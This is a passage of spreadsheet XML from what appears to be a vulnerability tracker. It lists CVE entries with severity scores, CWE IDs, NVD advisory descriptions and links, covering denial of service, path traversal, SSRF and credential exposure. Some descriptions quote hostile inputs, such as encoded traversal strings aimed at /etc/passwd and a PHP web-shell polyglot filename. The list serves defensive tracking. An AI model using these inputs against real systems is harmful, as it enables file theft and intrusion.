        </is>
      </c>
    </row>
    <row r="2650">
      <c r="A2650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52879</t>
        </is>
      </c>
      <c r="C2650" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2650" s="5" t="inlineStr"/>
      <c r="F2650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2650" s="5" t="inlineStr"/>
      <c r="H2650" s="5" t="inlineStr"/>
      <c r="I2650" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2650" s="5" t="inlineStr"/>
      <c r="K2650" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2650" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. In versions 1.7.14 through 1.7.17, the direct-message ingress handler spawns a new goroutine for every incoming direct message before the processor-level antiflood layer makes any admission decision, with no semaphore, throttler, or bound on the number of concurrent in-flight spawns. Because the antiflood check runs inside the spawned goroutine rather than before it, a single connected peer can open a direct-send stream and send a stream of well-formed messages to force unbounded goroutine creation, where each goroutine allocates its own stack and holds a message reference until processing completes, adding scheduler and garbage-collection pressure faster than the runtime can drain it. This lets one peer degrade the node's availability and its ability to process legitimate traffic, resulting in a remotely triggerable denial of service. The issue is fixed in 1.7.18.</t>
        </is>
      </c>
      <c r="M2650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52879</t>
        </is>
      </c>
    </row>
    <row r="2651">
      <c r="A2651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52880</t>
        </is>
      </c>
      <c r="C2651" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2651" s="5" t="inlineStr"/>
      <c r="F2651" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2651" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2651" s="5" t="inlineStr"/>
      <c r="I2651" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2651" s="5" t="inlineStr"/>
      <c r="K2651" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2651" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Versions from 1.7.14 through 1.7.17 are vulnerable to a remotely triggerable denial of service. Both REST APIs are started with the Gin Engine.Run convenience method, which serves requests through Go's default HTTP server with no ReadHeaderTimeout, ReadTimeout, or MaxHeaderBytes configured. As a result, incoming connections that never complete their request headers are held open indefinitely. When a REST listener is reachable beyond localhost through the documented all-interface bind or a Docker port-publish deployment, a single unauthenticated client can open many slow-header connections and hold them open until server file descriptors are exhausted, preventing the API from accepting new connections. This renders the REST API unavailable to legitimate clients. This issue is fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M2651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52880</t>
        </is>
      </c>
    </row>
    <row r="2652">
      <c r="A2652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53503</t>
        </is>
      </c>
      <c r="C2652" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2652" s="5" t="inlineStr"/>
      <c r="F2652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2652" s="5" t="inlineStr"/>
      <c r="H2652" s="5" t="inlineStr"/>
      <c r="I2652" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2652" s="5" t="inlineStr"/>
      <c r="K2652" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-369</t>
        </is>
      </c>
      <c r="L2652" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor's filters:convolution(&lt;matrix&gt;, &lt;columns&gt;, &lt;should_normalize&gt;) filter passes the user-controlled &lt;columns&gt; value to a C extension (thumbor/ext/filters/_convolution.c) where it is used as a divisor (for % and /) without validating columns &gt; 0. When columns=0, the C code triggers undefined behavior; on x86_64 this reliably results in a fatal divide-by-zero trap (SIGFPE) and crashes the Thumbor process, causing a remote denial of service. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M2652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53503</t>
        </is>
      </c>
    </row>
    <row r="2653">
      <c r="A2653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53504</t>
        </is>
      </c>
      <c r="C2653" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2653" s="5" t="inlineStr"/>
      <c r="F2653" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2653" s="5" t="inlineStr"/>
      <c r="H2653" s="5" t="inlineStr"/>
      <c r="I2653" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2653" s="5" t="inlineStr"/>
      <c r="K2653" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2653" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, the convolution filter regular expression performs exponential backtracking on crafted repeated numeric input, allowing a URL request to exhaust processing time. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M2653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53504</t>
        </is>
      </c>
    </row>
    <row r="2654">
      <c r="A2654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53505</t>
        </is>
      </c>
      <c r="C2654" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2654" s="5" t="inlineStr"/>
      <c r="F2654" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2654" s="5" t="inlineStr"/>
      <c r="H2654" s="5" t="inlineStr"/>
      <c r="I2654" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2654" s="5" t="inlineStr"/>
      <c r="K2654" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2654" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor's filters:proportion(&lt;value&gt;) filter does not enforce an upper bound on &lt;value&gt; and runs in the post-transform phase. An attacker can trigger extremely large resizes (CPU/memory exhaustion) and cause denial of service. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M2654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53505</t>
        </is>
      </c>
    </row>
    <row r="2655">
      <c r="A2655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53587</t>
        </is>
      </c>
      <c r="C2655" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2655" s="5" t="inlineStr"/>
      <c r="F2655" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2655" s="5" t="inlineStr"/>
      <c r="H2655" s="5" t="inlineStr"/>
      <c r="I2655" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2655" s="5" t="inlineStr"/>
      <c r="K2655" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126, CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="L2655" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, libgit2 performs a fixed-size strncmp in set_data in src/libgit2/transports/smart_pkt.c without first verifying that the smart-protocol pkt-line capability buffer contains 14 bytes. A malicious Git server can make bytes after the pkt-line complete object-format=, causing format_str to advance beyond the pkt-line and the following memchr length calculation to underflow. The resulting heap out-of-bounds walk can crash a client during the first refs-advertisement packet over HTTP, HTTPS, SSH, or the Git protocol. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M2655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53587</t>
        </is>
      </c>
    </row>
    <row r="2656">
      <c r="A2656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53599</t>
        </is>
      </c>
      <c r="C2656" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2656" s="5" t="inlineStr"/>
      <c r="F2656" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2656" s="5" t="inlineStr"/>
      <c r="H2656" s="5" t="inlineStr"/>
      <c r="I2656" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2656" s="5" t="inlineStr"/>
      <c r="K2656" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L2656" s="5" t="inlineStr">
        <is>
          <t>REDAXO is a PHP-based content management system. From 5.18.2 until 5.21.1, rex_mediapool::isAllowedExtension in redaxo/src/addons/mediapool/lib/mediapool.php lets an authenticated backend user with media[upload] permission upload a JPEG/PHP polyglot named shell.php.any.jpg, which web servers with multi-extension PHP handlers can execute as the web-server user. This issue is fixed in version 5.21.1.</t>
        </is>
      </c>
      <c r="M2656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53599</t>
        </is>
      </c>
    </row>
    <row r="2657">
      <c r="A2657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54293</t>
        </is>
      </c>
      <c r="C2657" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2657" s="5" t="inlineStr"/>
      <c r="F2657" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2657" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2657" s="5" t="inlineStr">
        <is>
          <t>nltk:nltk</t>
        </is>
      </c>
      <c r="I2657" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J2657" s="5" t="inlineStr"/>
      <c r="K2657" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2657" s="5" t="inlineStr">
        <is>
          <t>NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1.</t>
        </is>
      </c>
      <c r="M2657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54293</t>
        </is>
      </c>
    </row>
    <row r="2658">
      <c r="A2658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54598</t>
        </is>
      </c>
      <c r="C2658" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2658" s="5" t="inlineStr"/>
      <c r="F2658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2658" s="5" t="inlineStr"/>
      <c r="H2658" s="5" t="inlineStr"/>
      <c r="I2658" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2658" s="5" t="inlineStr"/>
      <c r="K2658" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2658" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, endpoints/db/migrate.php executes database schema migrations when called over HTTP with zero authentication. Any unauthenticated attacker can trigger pending migration files against the live SQLite database. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="M2658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54598</t>
        </is>
      </c>
    </row>
    <row r="2659">
      <c r="A2659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54599</t>
        </is>
      </c>
      <c r="C2659" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2659" s="5" t="inlineStr"/>
      <c r="F2659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2659" s="5" t="inlineStr"/>
      <c r="H2659" s="5" t="inlineStr"/>
      <c r="I2659" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2659" s="5" t="inlineStr"/>
      <c r="K2659" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2659" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, login.php generates an OIDC state nonce stored in $_SESSION['oidc_state'], but checksession.php dispatches the OIDC callback without comparing the incoming state against the session value. An attacker can trick a victim into visiting a crafted URL, causing Wallos to exchange the attacker's authorization code and log the victim into the attacker's account. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="M2659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54599</t>
        </is>
      </c>
    </row>
    <row r="2660">
      <c r="A2660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54638</t>
        </is>
      </c>
      <c r="C2660" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2660" s="5" t="inlineStr"/>
      <c r="F2660" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2660" s="5" t="inlineStr"/>
      <c r="H2660" s="5" t="inlineStr"/>
      <c r="I2660" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J2660" s="5" t="inlineStr"/>
      <c r="K2660" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L2660" s="5" t="inlineStr">
        <is>
          <t>gotd/td is a T Telegram MTProto API client in Go. Prior to 0.145.1, proto.UnencryptedMessage.Decode in proto/unencrypted_message.go read attacker controlled dataLen from an unauthenticated MTProto unencrypted packet and allocated make([]byte, dataLen) before checking the remaining buffer, allowing remote unauthenticated denial of service through excessive memory allocation and CPU or garbage collection pressure. This issue is fixed in version 0.145.1.</t>
        </is>
      </c>
      <c r="M2660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54638</t>
        </is>
      </c>
    </row>
    <row r="2661">
      <c r="A2661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54788</t>
        </is>
      </c>
      <c r="C2661" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2661" s="5" t="inlineStr"/>
      <c r="F2661" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2661" s="5" t="inlineStr"/>
      <c r="H2661" s="5" t="inlineStr"/>
      <c r="I2661" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2661" s="5" t="inlineStr"/>
      <c r="K2661" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2661" s="5" t="inlineStr">
        <is>
          <t>dd-trace-rs provides Datadog application performance monitoring for Rust. From 0.1.0 until 0.3.3, datadog-opentelemetry/src/propagation/tracecontext.rs parses the W3C tracestate header and collects every semicolon-separated key and value pair in the Datadog dd=... vendor entry into a HashMap without enforcing a pair count or entry size limit. Because tracecontext extraction is enabled by default, a remote unauthenticated attacker can send an arbitrarily large dd=... entry and force excessive CPU and memory consumption for each request, causing denial of service in an instrumented network service. This vulnerability is fixed in 0.3.3.</t>
        </is>
      </c>
      <c r="M2661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54788</t>
        </is>
      </c>
    </row>
    <row r="2662">
      <c r="A2662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55099</t>
        </is>
      </c>
      <c r="C2662" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2662" s="5" t="inlineStr"/>
      <c r="F2662" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2662" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2662" s="5" t="inlineStr"/>
      <c r="I2662" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2662" s="5" t="inlineStr"/>
      <c r="K2662" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L2662" s="5" t="inlineStr">
        <is>
          <t>icalendar is an RFC 5545 compatible parser and generator of iCalendar files for Python. From 7.1.0 until 7.1.3, the Component equality method in src/icalendar/cal/component.py compares nested subcomponents with two membership loops, and each membership test invokes the same method on child components, causing O(2^n) work relative to nesting depth. Component.from_ical accepts arbitrarily nested BEGIN:VEVENT blocks without a depth limit, so an attacker can submit a sub-kilobyte .ics file containing equal nested subtrees and trigger the cost when an application performs equality, inequality, membership, deduplication, test-assertion, round-trip, or normalization comparisons. Parsing alone does not trigger the issue, and comparisons that differ early short-circuit, but a few hundred bytes can pin a CPU core for minutes or indefinitely, causing denial of service in calendar sync or import endpoints, invite processing, and other comparison paths. This issue is fixed in version 7.1.3.</t>
        </is>
      </c>
      <c r="M2662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55099</t>
        </is>
      </c>
    </row>
    <row r="2663">
      <c r="A2663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55215</t>
        </is>
      </c>
      <c r="C2663" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2663" s="5" t="inlineStr"/>
      <c r="F2663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2663" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H2663" s="5" t="inlineStr"/>
      <c r="I2663" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2663" s="5" t="inlineStr"/>
      <c r="K2663" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-522</t>
        </is>
      </c>
      <c r="L2663" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to versions 3.3.3, 3.4.6, and 3.5.3, when ssl is enabled without a pinned CA or server certificate, MariaDB Connector/Node.js sends credentials before completing certificate fingerprint validation. In lib/cmd/handshake/auth/handshake.js, a server that selects mysql_clear_password as the initial authentication plugin can receive the password before the post-TLS identity check. In lib/cmd/handshake/authentication.js, an authentication switch can evaluate the previous plugin instead of the requested target plugin, allowing mysql_clear_password to send the credential first. An active man-in-the-middle can present a self-signed certificate, capture the database password, and use it to authenticate directly even though the connector later rejects the server and closes the connection. This issue is fixed in versions 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M2663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55215</t>
        </is>
      </c>
    </row>
    <row r="2664">
      <c r="A2664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55484</t>
        </is>
      </c>
      <c r="C2664" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2664" s="5" t="inlineStr"/>
      <c r="F2664" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2664" s="5" t="inlineStr"/>
      <c r="H2664" s="5" t="inlineStr"/>
      <c r="I2664" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2664" s="5" t="inlineStr"/>
      <c r="K2664" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-754</t>
        </is>
      </c>
      <c r="L2664" s="5" t="inlineStr">
        <is>
          <t>ALOS HTTP is a Linux-first Go web framework and application server built around a custom networking stack. Prior to 0.0.0-20260617230736-314b6783e196, core/utils.go::sanitizeRequestPath calls splitPathQuery on a request path beginning with a question mark and then performs the unchecked p[0] access without checking whether the resulting path is empty. An unauthenticated client can send a malformed request such as a question-mark-only path through h1_plain.go::ParseH1RequestHead, hpack.go::decodeSimpleGetPathHTTPSRequest, hpack.go::observeHeader, or h3_conn.go::handleRequestStream, causing an out-of-bounds panic before core.Recovery() middleware runs and terminating the server process. This issue is fixed in pseudo-version 0.0.0-20260617230736-314b6783e196.</t>
        </is>
      </c>
      <c r="M2664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55484</t>
        </is>
      </c>
    </row>
    <row r="2665">
      <c r="A2665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55524</t>
        </is>
      </c>
      <c r="C2665" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2665" s="5" t="inlineStr"/>
      <c r="F2665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2665" s="5" t="inlineStr"/>
      <c r="H2665" s="5" t="inlineStr"/>
      <c r="I2665" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2665" s="5" t="inlineStr"/>
      <c r="K2665" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L2665" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions prior to 1.6.58, the web_crawl tool performs its SSRF check only on the initially supplied URL, allowing the protection to be bypassed so the tool connects to attacker-chosen internal destinations. The check resolves the hostname once with socket.gethostbyname and rejects private/loopback/link-local results, but then passes the URL to a fetcher using httpx.Client(follow_redirects=True) (or urllib.request.urlopen when httpx is absent, which also follows redirects) that re-resolves the hostname at connect time with no further validation. This validate-here/fetch-there gap is exploitable through both HTTP redirects and DNS rebinding. If an attacker can influence URLs passed to web_crawl(), directly or through an agent/tool workflow, they can cause the PraisonAI host to fetch loopback, private-network, or cloud metadata endpoints reachable from that host, with the response body returned in the web_crawl() result. This issue has been fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M2665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55524</t>
        </is>
      </c>
    </row>
    <row r="2666">
      <c r="A2666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55525</t>
        </is>
      </c>
      <c r="C2666" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2666" s="5" t="inlineStr"/>
      <c r="F2666" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2666" s="5" t="inlineStr"/>
      <c r="H2666" s="5" t="inlineStr"/>
      <c r="I2666" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2666" s="5" t="inlineStr"/>
      <c r="K2666" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2666" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the web_crawl function validates only the initial URL before _crawl_with_httpx uses httpx.Client(follow_redirects=True). Redirect targets are not revalidated, so an attacker who influences a crawl target can redirect a public URL to loopback, private network, or cloud metadata services while ALLOW_LOCAL_CRAWL remains disabled. The fetched internal response is returned to the agent context. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M2666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55525</t>
        </is>
      </c>
    </row>
    <row r="2667">
      <c r="A2667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55552</t>
        </is>
      </c>
      <c r="C2667" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2667" s="5" t="inlineStr"/>
      <c r="F2667" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2667" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2667" s="5" t="inlineStr"/>
      <c r="I2667" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2667" s="5" t="inlineStr"/>
      <c r="K2667" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2667" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.11.13, Yamcs StaticFileHandler.locateFile resolves an unauthenticated request path without using Path.normalize and Path.toAbsolutePath to confirm that the absolute path remains within the configured staticRoots. A path containing traversal segments can escape the intended web root and return an arbitrary readable host file. The flaw is in yamcs-core/src/main/java/org/yamcs/http/StaticFileHandler.java and can disclose sensitive operating-system and application data. This issue is fixed in version 5.11.13, and the 5.12 line is fixed from version 5.12.0.</t>
        </is>
      </c>
      <c r="M2667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55552</t>
        </is>
      </c>
    </row>
    <row r="2668">
      <c r="A2668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55553</t>
        </is>
      </c>
      <c r="C2668" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2668" s="5" t="inlineStr"/>
      <c r="F2668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2668" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2668" s="5" t="inlineStr"/>
      <c r="I2668" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2668" s="5" t="inlineStr"/>
      <c r="K2668" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201, CWE-522</t>
        </is>
      </c>
      <c r="L2668" s="5" t="inlineStr">
        <is>
